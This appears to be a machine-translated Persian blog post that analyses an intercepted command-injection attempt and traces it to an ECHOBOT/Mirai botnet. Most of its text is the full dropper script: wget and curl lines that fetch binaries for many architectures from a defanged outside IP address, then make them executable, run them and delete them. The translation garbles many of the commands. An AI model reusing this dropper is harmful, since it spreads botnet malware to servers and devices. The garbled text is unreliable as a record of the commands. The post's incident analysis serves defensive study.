چه چیزی در پشت این فرمان تزریق قرار دارد؟

Posted on | Posted on vpn

ما یک فرمان تزریق را رهگیری کردیم ، که از طریق وب سایتی که نظارت می کنیم وارد آن شد. توجه: من داده های خاص مشتری را از این حذف کرده ام و از اطلاعات URL GENERALIZED برای نشان دادن آنچه قرار بود این دستور استفاده کند ، استفاده می کنم. ما اسکریپتی را که او برای امتحان و بهره برداری از سرور استفاده می کرد ، فهمیدیم – او کدی اسکریپت از روسیه بود. (میزبان آسیب پذیر نبوده است آسیب دیده! به روز شده باشید! در غیر این صورت ، این یک روز پاکسازی بوده است ، نه یک پست!)

** اخطار: همه چیز بعد از این بسیار خشن است. !!! **

www.example.com/location/to/script.extension؟wget٪20http://145.249 (نقطه) 106.241 / richard؛ curl٪ 20-O٪ 20hxxp: //145.249 (نقطه) 106.241 / richard؛ chmod٪ 20 + x richard؛ sh richard؛

این ترجمه به
# وب سایت Vulnerable سمت سرور دستورات زیر را اجرا می کند.
wget hxxp: //145.249 (dot) 106.241 / richard؛ # بارگیری نخست
curl -O hxxp: //145.249 (نقطه) 106.241 / richard؛ #second بارگیری
chmod + x richard؛ #Make Richard اجرایی
sh richard # اجرای اسکریپت "richard"
گاهی اوقات میزبان دستورات خاص را مسدود می کند (مانند wget و curl ، از این رو هر دو را اجرا می کند. بدترین اتفاقی که رخ می دهد یکی بازنویسی دیگری است!)

از سرور خود پرونده بگیرید و این را پیدا کردید.

#! / bin / bash
cd / tmp || cd / var / run || سی دی / مونت || سی دی / ریشه || سی دی /؛ wget hxxp: //145.249 (نقطه) 106.241 / ECHOBOT.arm؛ chmod + x ECHOBOT.arm؛ ./ECHOBOT.arm؛ rm -rf ECHOBOT.arm
cd / tmp || cd / var / run || سی دی / مونت || سی دی / ریشه || سی دی /؛ wget hxxp: //145.249 (نقطه) 106.241 / ECHOBOT.arm4؛ chmod + x ECHOBOT.arm4؛ ./ECHOBOT.arm4؛ rm -rf ECHOBOT.arm4
cd / tmp || cd / var / run || سی دی / مونت || سی دی / ریشه || سی دی /؛ wget hxxp: //145.249 (نقطه) 106.241 / ECHOBOT.arm5؛ chmod + x ECHOBOT.arm5؛ ./ECHOBOT.arm5؛ rm -rf ECHOBOT.arm5
cd / tmp || cd / var / run || سی دی / مونت || سی دی / ریشه || سی دی /؛ wget hxxp: //145.249 (نقطه) 106.241 / ECHOBOT.arm6؛ chmod + x ECHOBOT.arm6؛ ./ECHOBOT.arm6؛ rm -rf ECHOBOT.arm6
cd / tmp || cd / var / run || سی دی / مونت || سی دی / ریشه || سی دی /؛ wget hxxp: //145.249 (نقطه) 106.241 / ECHOBOT.arm7؛ chmod + x ECHOBOT.arm7؛ ./ECHOBOT.arm7؛ rm -rf ECHOBOT.arm7
cd / tmp || cd / var / run || سی دی / مونت || سی دی / ریشه || سی دی /؛ wget hxxp: //145.249 (نقطه) 106.241 / ECHOBOT.i686؛ chmod + x ECHOBOT.i686؛ ./ECHOBOT.i686؛ rm -rf ECHOBOT.i686
cd / tmp || cd / var / run || سی دی / مونت || سی دی / ریشه || سی دی /؛ wget hxxp: //145.249 (نقطه) 106.241 / ECHOBOT.m68k؛ chmod + x ECHOBOT.m68k؛ ./ECHOBOT.m68k؛ rm -rf ECHOBOT.m68k
cd / tmp || cd / var / run || سی دی / مونت || سی دی / ریشه || سی دی /؛ wget hxxp: //145.249 (نقطه) 106.241 / ECHOBOT.mips؛ chmod + x ECHOBOT.mips؛ ./ECHOBOT.mips؛ rm -rf ECHOBOT.mips
cd / tmp || cd / var / run || سی دی / مونت || سی دی / ریشه || سی دی /؛ wget hxxp: //145.249 (نقطه) 106.241ECHOBOT.mpsl؛ chmod + x ECHOBOT.mpsl؛ ./ECHOBOT.mpsl؛ rm -rf ECHOBOT.mpsl
cd / tmp || cd / var / run || سی دی / مونت || سی دی / ریشه || سی دی /؛ wget hxxp: //145.249 (نقطه) 106.241 / ECHOBOT.ppc؛ chmod + x ECHOBOT.ppc؛ ./ECHOBOT.ppc؛ rm -rf ECHOBOT.ppc
cd / tmp || cd / var / run || سی دی / مونت || سی دی / ریشه || سی دی /؛ wget hxxp: //145.249 (نقطه) 106.241 / ECHOBOT.sh4؛ chmod + x ECHOBOT.sh4؛ ./ECHOBOT.sh4؛ rm -rf ECHOBOT.sh4
cd / tmp || cd / var / run || سی دی / مونت || سی دی / ریشه || سی دی /؛ wget hxxp: //145.249 (نقطه) 106.241 / ECHOBOT.spc؛ chmod + x ECHOBOT.spc؛ ./ECHOBOT.spc؛ rm -rf ECHOBOT.spc
cd / tmp || cd / var / run || سی دی / مونت || سی دی / ریشه || سی دی /؛ wget hxxp: //145.249 (نقطه) 106.241 / ECHOBOT.x86؛ chmod + x ECHOBOT.x86؛ ./ECHOBOT.x86؛ rm -rf ECHOBOT.x86

توضیح این دستورات به شرح زیر است.

اگر نمی توانید cd / tmp را بزنید ، سعی کنید / var / run را اجرا کنید ، در غیر اینصورت اگر سعی / mnt کنید ، اگر دیگری سعی کنید / root کنید ، دیگری را امتحان کنید. اگر یکی از این موارد درست برگردد ، به دستور بعدی (wget) بروید. اگر اهل مطالعه بودید ، ممکن است در این فیلمنامه بچه ها تایپی را متوجه شوید. یک نسخه را امتحان می کند ، سپس خود را حذف می کند. همه آنها را امتحان کنید. او تا زمانی که یکی از گزارش های ECHOBOT گزارش کند ، شنونده ای دارد که گوش می دهد.

البته اینها فقط عملکردهای wget ساده هستند! ما می توانیم آن را نیز بارگیری کنیم!

curl -O hxxp: // 145 (dot) 249 (dot) 106 (dot) 241 / ECHOBOT (dot) بازوی
curl -O hxxp: // 145 (dot) 249 (نقطه) 106 (نقطه) 241 / ECHOBOT (نقطه) arm4
curl -O hxxp: // 145 (dot) 249 (dot) 106 (dot) 241 / ECHOBOT (dot) arm5
curl -O hxxp: // 145 (نقطه) 249 (نقطه) 106 (نقطه) 241 / ECHOBOT (نقطه) بازوی6
curl -O hxxp: // 145 (نقطه) 249 (نقطه) 106 (نقطه) 241 / ECHOBOT (نقطه ) arm7
curl -O hxxp: // 145 (dot) 249 (dot) 106 (dot) 241 / ECHOBOT (dot) i686
curl -O hxxp: // 145 (dot) 249 (dot) 106 (نقطه) 241 / ECHOBOT (نقطه) m68k
curl -O hxxp: // 145 (dot) 249 (dot) 106 (dot) 241 / ECHOBOT (dot) mips
curl -O hxxp: // 145 (نقطه) 249 (نقطه) 106 (نقطه) 241ECHOBOT (نقطه) mpsl
curl -O hxxp: // 145 (نقطه) 249 (نقطه) 106 (نقطه) 241 / ECHOBOT (نقطه) ppc
curl - O hxxp: // 145 (نقطه) 249 (نقطه) 106 (نقطه) 241 / ECHOBOT (نقطه) sh4
curl -O hxxp: // 145 (نقطه) 249 (نقطه) 106 (نقطه) 241 / ECHOBOT ( dot) spc
curl -O hxxp: // 145 (dot) 249 (dot) 106 (dot) 241 / ECHOBOT (dot) x86

این پرونده ها چه فاش می کنند؟ هیچ یک دیگر پس از آن از Mirai، این backdoor / بات نت!

https://www.virustotal.com/gui/file-analysis/NTAxZGQwY2M5MGYyODkyOTYwMzNlY2FkYWE2MjYwNGY6MTU3NjEwNjY2OQ==/detection

تلاش خوب است، اما به سختی شکست خوردند. تا به امروز ، ما (شرکت من) هرگز نتوانسته ایم نمونه زنده Mirai را بگیریم. امروز ، من موفق به گرفتن آن را به عنوان اتفاق افتاد! تشویق محصول IPS / IDS که تلاش با سوء استفاده را شناسایی و مسدود کرد!

* از زمان نوشتن این پست ، این پیوندها هنوز زنده هستند! به شما اخطار داده شده است! *